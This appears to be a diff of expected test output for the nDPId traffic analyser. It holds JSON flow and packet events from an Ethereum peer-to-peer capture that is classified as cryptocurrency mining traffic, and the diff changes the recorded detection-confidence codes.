-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": 
{"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1578508364382,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364382,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHegkAAEARY2nAqAG4NOelbHZfdl8As+VvAUq3Z7jOf6Ug2frhkOredmKGawH96dNwPwCsVwwwAuHNRLachJG6Hj8pd5+\/iUKj3xzFalkHy\/4zo7e13\/nakEgcyoOcntMlISOmld4GtANNEoWSHW0IYrUbIiG7qvHSAQP4R7hAGwckxV38aoEQ3R3z6i1sbxgztMaJbhd8mlK6anhGQ6H0+w6JOUS\/FIH4b+eX+gcKRXXgkrfcf69BwK1A+Siq+4ReFiBg"} 
-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1578508364382,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364382,"pkt":"EBMx8Tl2KDc3AG3ICABFAADH\/g8AAEAROunAqAG4EopsQ3Zfdl8As0D2AUq3Z7jOf6Ug2frhkOredmKGawH96dNwPwCsVwwwAuHNRLachJG6Hj8pd5+\/iUKj3xzFalkHy\/4zo7e13\/nakEgcyoOcntMlISOmld4GtANNEoWSHW0IYrUbIiG7qvHSAQP4R7hAGwckxV38aoEQ3R3z6i1sbxgztMaJbhd8mlK6anhGQ6H0+w6JOUS\/FIH4b+eX+gcKRXXgkrfcf69BwK1A+Siq+4ReFiBg"} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364382,"flow_last_seen":1578508364382,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364382,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364421,"flow_last_seen":1578508364421,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364421,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1578508364421,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364421,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHWYMAAEARj8vAqAG4ImGsFnZfdl8As\/EZ15lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364421,"flow_last_seen":1578508364421,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364421,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364421,"flow_last_seen":1578508364421,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364421,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364422,"flow_last_seen":1578508364422,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364422,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1578508364422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508364422,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcLWUAAEAR9WvAqAG4QipS9nZfdl8AiGZvYT14ALKwnMdgMCBzf19RhoDEZwfAnRP1Mz5t1CQfWH9BMW+RtakCpISLcdct0MfsiOdcBIDUccBBbd+y\/K0wDya+KeRA13HRMdUz2NPxyyUESIw4\/BeiGYIdI8USz9rYAAHdBMuEfwAAAYJ2X4J2X8mEQipS9oJ2X4CEXhYgYAU="} 
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364422,"flow_last_seen":1578508364422,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364422,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364422,"flow_last_seen":1578508364422,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364422,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1578508364422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364422,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHAOAAAEAR3JLAqAG4NOelbHZfdl8As+U915lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"} 01863{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1578508364519,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"thread_ts_msec":1578508364519,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ7F1RAAC8RPN4D0S1PwKgBuHZfdl8EJ4PVaVYTvO9LrTk6yni9j9O4lLCx8c3w2iOwFQRksfASVhzN6T8K7lnXRwHY7v3+ONhElGFbYOffjDytd02o206R62nDNZ+LcEa5V5K9KHZQh029ihE8Ury3mI0LZjHE13ZDAAT5A7r5A7L4S4QjtPapgnZdgLhAO5qC1ATimkffsyZlSJIXGVIuxdFsM86E7cqAjFOnv\/8DXNCQHJBVJiDXoCE+xGUbCBkPCreAagxpFk0Kv5X\/6PhNhKUWayGCdl+Cdl+4QFK2HHRAlM9Mj+TxGD7ACVRZHZtB58hxcD+hW2XdmacQwMOkGeflfz3iQaCGa6bw7UpxurZYH9DtQSW8Gn+wiV74TYRZJmMignZfgnZfuEBNXexB6IZur6GByNXF5kqBGoYoINyuPaRzRT\/L\/XeZwo80a\/N6vMBtsgrq2ZF9h4G0sqa47Wg7uKDWSZtY6p\/o+E2EsoDD3IJ2X4J2X7hAE9D206tRuSrRWszd5+5PqyxrzPQHPgJ6M4jR3YAwA4SXyWoQd9UmDUgHBtsrr3UYDBX+DpI9ijrH8jmNKWfim\/hNhKLzoFOCdl+Cdl+4QFcgAb+wxvXRoA\/jZ6pZpvtWMqWRnDTAVCrWET9xUm+STSO+d5OO9wGG7pHu9I5ueUw\/fAd5lu3NtaUH9uwTgQX4TYQSilEcgnZfgnZfuEDrOA+HQ7eWMjwlUeqXlrKvkuj1DTxVelkYAtV5dglpnIhrBZIeo034r7N3OARecEoNp0x6OeeY\/TD1OnJUir9u+E2EMyY8T4J2X4J2X7hAjvDxlr5M7BUzw40ony1SnzUKukEALVTn0B8WrIdd1Y\/HWL6mkTC4nsoMDegX1FF++rFMqjeViKJkeSDvzXh7sPhNh
ChDkICCdl+Cdl+4QHLmnbcNhaAJxQnuC0km5NBqC0yHT\/O8y7iwbqWb3zIi\/JNBIGOytm1SPyhBCVXEAh08vp59waAp0Fl3XZsLDpX4TYTH56bignZggnZguEAmai5v1neViV7teAsEvO\/IJYfemYLf2+j3ix3twO4cHaO8DDPa+4MSEcEzAFsUx\/2pmlUPII1TqUXgDk2+EYuF+E2EMyZRtIJ2X4J2X7hAgHT+RrAG20B8DB\/bHPvQKm79m+Z0+BB1fJpuHmieLdFavNthxznxmL2TjLC2hF17uhr9nJ8lRGk+kyETydUasfhNhFKR3PmCdl+Cdl+4QN1yRfRd+2g8MnNCa1j1Cnr1GFpxy7vxkYduQKQx1cGeo9xW0LFVTR4sISMRFqTJvP1+kBDeZDQ7++taiTPWLVf4TYSfy1QfgnZfgnZfuEATr9aMDwnYcu1Ru9AfCYxf1j4pIYv3iEkEPcprByn6GaZXC692Pg7aNtJE7Ibn2jkRlWjrNM1fsvjqm9oBENLzhF4WIGA="} 01006{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1578508364519,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364519,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFF1VAAC8RP1MD0S1PwKgBuHZfdl8BsTR2htDCYwB7bPwVHRrppzCkGewLkUUNlB3jVcwKSsPl3PpRPPiYpogGSbVhGO6LOf+6vpmiVjQKuGK9fr9HzQor5V9uX7UyvZMEj8wMYsgT45Bz2Z7bdsQaazyQJOYgw3sXAAT5AUT5ATz4TYSi5B2ggnZfgnZfuEAwVdpN68jOobX+wHrrL2RH\/wK1ka2szeSJGHiHFFoNLEPxKwxFy33NRZ3ovPOnkwdh3qJaARUyaYeXnrMHfiPL+E2EpERrUoJ2YYJ2YbhAbVK4hBOIFxjMK61hoo+B2E1DFAGWystZDApZ1qWqMdGzPO6EtDCqKOy2kznyTf9sEf\/6IzNe3mDxF09nkCXqPPhNhCPpxYOCdl+Cdl+4QEyRwYHw012pKtGG4pX25QXUlp9AiY+SLu1l7sUn3fRNHZfvnNA3az+glcVdf8irWyfLyfxkF3pVP8czohGx7uH4TYTR+vDNgnZfgnZfuEDT1Pf73xy4M3qZSRLleOgEdgguFkAavHpg2I9RZUlU1ZSe7W107ts9v4ZrZs61PWJz3Pgt4YI56NsUnL8RZ7gNhF4WIGA="} 
@@ -65,112 +65,112 @@ 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1578508364565,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364565,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGYC7AqAG4I570l90ndl+E\/i4wBuq8c4AQECzS\/AAAAQEICiLYlHo03AK8"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1578508364566,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364566,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDf+ygMPcwKgBuHZf3TL4VGlQ8MrCSaAScSATXAAAAgQFrAQCCApfPQwNItiUTwEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1578508364566,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364566,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAgfAqAG4soDD3N0ydl\/wysJJ+FRpUYAQECyi6QAAAQEICiLYlHpfPQwN"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":495,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":546,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":495,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":546,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1578508364569,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364569,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGyBNZJmMiwKgBuHZf3TAEAfQVmn8HEKAScSAQTQAAAgQFrAQCCApfmkPpItiUTwEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1578508364569,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364569,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvBvAqAG4WSZjIt0wdl+afwcQBAH0FoAQECyf1wAAAQEICiLYlH1fmkPp"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364571,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364571,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364571,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364571,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1578508364593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGVuwi\/xdxwKgBuHZf3TMrXBsGHvlEKaAScSD3ewAAAgQFrAQCCAqnEIc7ItiUTwEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1578508364593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPfTAqAG4Iv8Xcd0zdl8e+UQpK1wbB4AQECyG7wAAAQEICiLYlJSnEIc7"} 
